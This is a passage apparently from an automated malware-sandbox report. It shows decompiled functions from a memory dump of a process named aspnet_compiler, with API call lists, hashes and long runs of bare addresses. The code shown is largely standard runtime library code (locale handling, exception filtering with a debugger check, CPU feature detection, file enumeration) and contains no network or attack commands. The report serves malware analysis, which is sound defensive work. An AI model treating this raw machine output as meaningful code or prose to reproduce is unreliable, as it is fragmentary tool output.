                0x00450a74
                0x00000000
                0x00450a74
                0x00450a2a
                0x00450a2f
                0x00450a32
                0x00450a34
                0x00000000
                0x00000000
                0x00450a36
                0x00450a36
                0x00450a39
                0x00450a3c
                0x00450a3f
                0x00450a42
                0x00450a42
                0x00450a45
                0x00450a48
                0x00450a48
                0x00450a55
                0x00450a58
                0x00450a5a
                0x00450a5a
                0x00450a07
                0x00450a07
                0x00450a0d
                0x00450a76
                0x00450a76
                0x00450a76
                0x00000000
                0x00450a05
                0x004509a1
                0x004509a1
                0x00000000

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450997
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004509E8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450AA8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorInfoLastLocale$_free$_abort
                • String ID:
                • API String ID: 2829624132-0
                • Opcode ID: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                • Instruction ID: da7bcabd89bfc395045dfa7eb9e966dc36f5abb2093a3d853536695ab6a7a704
                • Opcode Fuzzy Hash: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                • Instruction Fuzzy Hash: E361A3795002079FEB289F64CC82B7B77A8EF14306F1081ABED05C6246E778ED49CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043A3F1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 76%
                			E0043A3F1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46f00c; // 0xd60a1515
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0043349F(_t41);
					_pop(_t62);
				}
				E00435760(_t67,  &_v804, 0, 0x50);
				E00435760(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0043349F(_t57);
				}
				return E004338BB(_v8 ^ _t70);
			}




































                0x0043a3f1
                0x0043a3f1
                0x0043a3f1
                0x0043a3f1
                0x0043a3fc
                0x0043a401
                0x0043a403
                0x0043a40b
                0x0043a40d
                0x0043a410
                0x0043a415
                0x0043a415
                0x0043a421
                0x0043a434
                0x0043a442
                0x0043a448
                0x0043a44e
                0x0043a454
                0x0043a45a
                0x0043a460
                0x0043a466
                0x0043a46c
                0x0043a472
                0x0043a478
                0x0043a47f
                0x0043a486
                0x0043a48d
                0x0043a494
                0x0043a49b
                0x0043a4a2
                0x0043a4a3
                0x0043a4ac
                0x0043a4b2
                0x0043a4b5
                0x0043a4bb
                0x0043a4c8
                0x0043a4d1
                0x0043a4da
                0x0043a4e3
                0x0043a4f1
                0x0043a4f3
                0x0043a508
                0x0043a514
                0x0043a517
                0x0043a51c
                0x0043a52b

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0043A4E9
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043A4F3
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A500
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                • Instruction ID: 1402d3c3d6381031a2721457eed26b4c58248f3cce99d36bfdd4232644ff5fa2
                • Opcode Fuzzy Hash: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                • Instruction Fuzzy Hash: 3031D37590132CABCB21DF24D88879DBBB8AF08315F5052EAE81CA7251E7749B858F49
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441B85 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00441B85(int _a4) {
				void* _t14;
				void* _t16;

				if(E00447549(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00441C0A(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                0x00441b91
                0x00441bad
                0x00441bad
                0x00441bb6
                0x00441bbf

                APIs
                • GetCurrentProcess.KERNEL32(?,?,00441B5B,?), ref: 00441BA6
                • TerminateProcess.KERNEL32(00000000,?,00441B5B,?), ref: 00441BAD
                • ExitProcess.KERNEL32 ref: 00441BBF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                • Instruction ID: 3981a427e79a20866ec782955a96dc1f6ef246171a4a80411b7f48c71aa59ebf
                • Opcode Fuzzy Hash: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                • Instruction Fuzzy Hash: 18E0BF31005348ABDF116F65EE49E593B69EB44356F0040A5F8094A632DB39ED82CA88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043354D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E0043354D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x46fd1c =  *0x46fd1c & 0x00000000;
				 *0x46f010 =  *0x46f010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x46f010 =  *0x46f010 | 0x00000002;
				 *0x46fd1c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x46fd20; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x46fd20 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x46f010 =  *0x46f010 | 0x00000004;
						 *0x46fd1c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x46f010; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x46fd1c = 3;
								 *0x46f010 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x46fd1c = 5;
									 *0x46f010 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x46fd20; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x46fd20 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                0x0043354d
                0x00433550
                0x0043355e
                0x0043356d
                0x004336ea
                0x004336f0
                0x004336f0
                0x00433573
                0x00433579
                0x00433584
                0x0043358a
                0x0043358d
                0x0043358e
                0x00433592
                0x00433593
                0x00433595
                0x00433598
                0x0043359d
                0x004335a6
                0x004335b7
                0x004335c2
                0x004335c8
                0x004335c9
                0x004335d1
                0x004335d7
                0x004335d9
                0x004335dc
                0x004335df
                0x004335e2
                0x00433627
                0x00433627
                0x0043362d
                0x00433634
                0x00433637
                0x0043363a
                0x0043363d
                0x00433640
                0x00433644
                0x00433647
                0x00433648
                0x0043364d
                0x00433650
                0x00433652
                0x00433655
                0x00433658
                0x0043365b
                0x00433663
                0x00433666
                0x00433669
                0x0043366e
                0x0043366e
                0x00433669
                0x0043367b
                0x0043367d
                0x00433684
                0x00433693
                0x0043369e
                0x004336a1
                0x004336a4
                0x004336b5
                0x004336bb
                0x004336c0
                0x004336c3
                0x004336d1
                0x004336d6
                0x004336db
                0x004336e5
                0x004336e5
                0x004336d6
                0x004336b5
                0x00433693
                0x00000000
                0x0043367b
                0x004335e7
                0x004335f1
                0x00433616
                0x0043361c
                0x0043361f
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00433566
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID: P@
                • API String ID: 2325560087-676759640
                • Opcode ID: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                • Instruction ID: a2294149a4fe3e39a77fcac35e687f8d246c97dff2426aff95b936701e7ffbe2
                • Opcode Fuzzy Hash: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                • Instruction Fuzzy Hash: 02516B71D002089FEB24CFA9E98669EBBF4FB08315F14917AD455E7350E374AA04CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044D0F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E0044D0F9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E004443F4(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00440303(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0044D338(_a16, __eflags, _t111);
							E00445002(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00440303(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043A5E8();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46f00c; // 0xd60a1515
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00454B80(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00435760(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0044D0F9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0043F8D0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044CF51);
									}
								} else {
									_push(_t55);
									_t57 = E0044D0F9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0044D0F9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E004338BB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































                0x0044d0fe
                0x0044d0ff
                0x0044d102
                0x0044d102
                0x0044d105
                0x0044d105
                0x0044d107
                0x0044d108
                0x0044d111
                0x0044d112
                0x0044d115
                0x0044d118
                0x0044d11d
                0x0044d124
                0x0044d125
                0x0044d126
                0x0044d129
                0x0044d133
                0x0044d136
                0x0044d137
                0x0044d139
                0x0044d14d
                0x0044d14d
                0x0044d150
                0x0044d15a
                0x0044d15f
                0x0044d162
                0x0044d164
                0x00000000
                0x0044d166
                0x0044d16a
                0x0044d173
                0x0044d179
                0x00000000
                0x0044d17c
                0x0044d13b
                0x0044d13b
                0x0044d141
                0x0044d146
                0x0044d149
                0x0044d14b
                0x0044d182
                0x0044d184
                0x0044d185
                0x0044d186
                0x0044d187
                0x0044d188
                0x0044d189
                0x0044d18e
                0x0044d192
                0x0044d194
                0x0044d19a
                0x0044d1a1
                0x0044d1a4
                0x0044d1a7
                0x0044d1a8
                0x0044d1ab
                0x0044d1ac
                0x0044d1af
                0x0044d1b0
                0x0044d1d1
                0x0044d1d1
                0x0044d1d3
                0x00000000
                0x00000000
                0x0044d1b8
                0x0044d1ba
                0x0044d1bc
                0x0044d1be
                0x0044d1c0
                0x0044d1c2
                0x0044d1c4
                0x0044d1cf
                0x00000000
                0x0044d1cf
                0x0044d1c4
                0x0044d1c0
                0x00000000
                0x0044d1bc
                0x0044d1d5
                0x0044d1d7
                0x0044d1da
                0x0044d1f3
                0x0044d1f3
                0x0044d1f5
                0x0044d1f8
                0x0044d208
                0x0044d20a
                0x0044d20a
                0x0044d1fa
                0x0044d1fa
                0x0044d1fd
                0x00000000
                0x0044d1ff
                0x0044d1ff
                0x0044d202
                0x00000000
                0x0044d204
                0x0044d204
                0x0044d204
                0x0044d202
                0x0044d1fd
                0x0044d210
                0x0044d218
                0x0044d21c
                0x0044d22a
                0x0044d22f
                0x0044d244
                0x0044d246
                0x0044d24c
                0x0044d24f
                0x0044d281
                0x0044d281
                0x0044d283
                0x0044d286
                0x0044d28c
                0x0044d28c
                0x0044d293
                0x0044d2ad
                0x0044d2ad
                0x0044d2bc
                0x0044d2c1
                0x0044d2c4
                0x0044d2c6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044d295
                0x0044d295
                0x0044d29b
                0x0044d29d
                0x00000000
                0x0044d29f
                0x0044d29f
                0x0044d2a2
                0x00000000
                0x0044d2a4
                0x0044d2a4
                0x0044d2ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044d2ab
                0x0044d2a2
                0x0044d29d
                0x00000000
                0x0044d2c8
                0x0044d2d0
                0x0044d2d6
                0x0044d2d8
                0x0044d2d8
                0x0044d2e0
                0x0044d2e5
                0x0044d2ed
                0x0044d2f0
                0x0044d2f2
                0x0044d306
                0x0044d30b
                0x0044d251
                0x0044d251
                0x0044d255
                0x0044d25d
                0x0044d25d
                0x0044d25d
                0x0044d25f
                0x0044d262
                0x0044d265
                0x0044d265
                0x0044d1dc
                0x0044d1df
                0x0044d1e1
                0x00000000
                0x0044d1e3
                0x0044d1e3
                0x0044d1e9
                0x0044d1ee
                0x0044d1e1
                0x0044d272
                0x0044d27d
                0x00000000
                0x00000000
                0x00000000
                0x0044d14b
                0x0044d11f
                0x0044d121
                0x0044d17d
                0x0044d181
                0x0044d181
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                • Instruction ID: a605d271e407c9958f5ebfb9e98191da8a3e066373b5453ef71e7620c58a5f30
                • Opcode Fuzzy Hash: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                • Instruction Fuzzy Hash: CA313571D00209AFEB249E79CC84EEB7BBDEB86308F1401AEF819D3251E6349D408B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045081B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 91%
                			E0045081B(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00446A95(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E00450917( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E00450943, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}



















                0x00450828
                0x0045082e
                0x0045082f
                0x00450832
                0x00450835
                0x00450835
                0x00450838
                0x0045083a
                0x00450848
                0x0045084e
                0x00450851
                0x00450854
                0x00450854
                0x00450857
                0x00450859
                0x00450862
                0x0045086d
                0x00450870
                0x00450876
                0x00450881
                0x00450881
                0x0045088a
                0x0045088d
                0x00450895
                0x0045089b
                0x0045089f
                0x004508a4
                0x004508a8
                0x004508ad
                0x004508af
                0x00000000
                0x004508af
                0x004508b5

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450943,00000001,00000000,?,m3D,?,00450F70,00000000,?,?,?), ref: 0045088D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID: m3D
                • API String ID: 1084509184-982802904
                • Opcode ID: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                • Instruction ID: 15c25865bd57dd9ed052f6de1c9d4bc0c6d7c90143c64c40a76a96693f8e609e
                • Opcode Fuzzy Hash: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                • Instruction Fuzzy Hash: 3E118C3B2007019FEB18AF39C8916BAB791FF80319B14883EED4647701D775B906C780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004508B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E004508B6(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00446A95(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E00450917( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E00450B93, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}













                0x004508c3
                0x004508c9
                0x004508ca
                0x004508cd
                0x004508d0
                0x004508d0
                0x004508d3
                0x004508d5
                0x004508e3
                0x004508e6
                0x004508eb
                0x004508f6
                0x004508f6
                0x004508ff
                0x00450902
                0x00450908
                0x0045090e
                0x00450910
                0x00000000
                0x00450910
                0x00450916

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450B93,00000001,?,?,m3D,?,00450F34,m3D,?,?,?,?,?,0044336D,?,?), ref: 00450902
                Strings
                Memory Dump Source
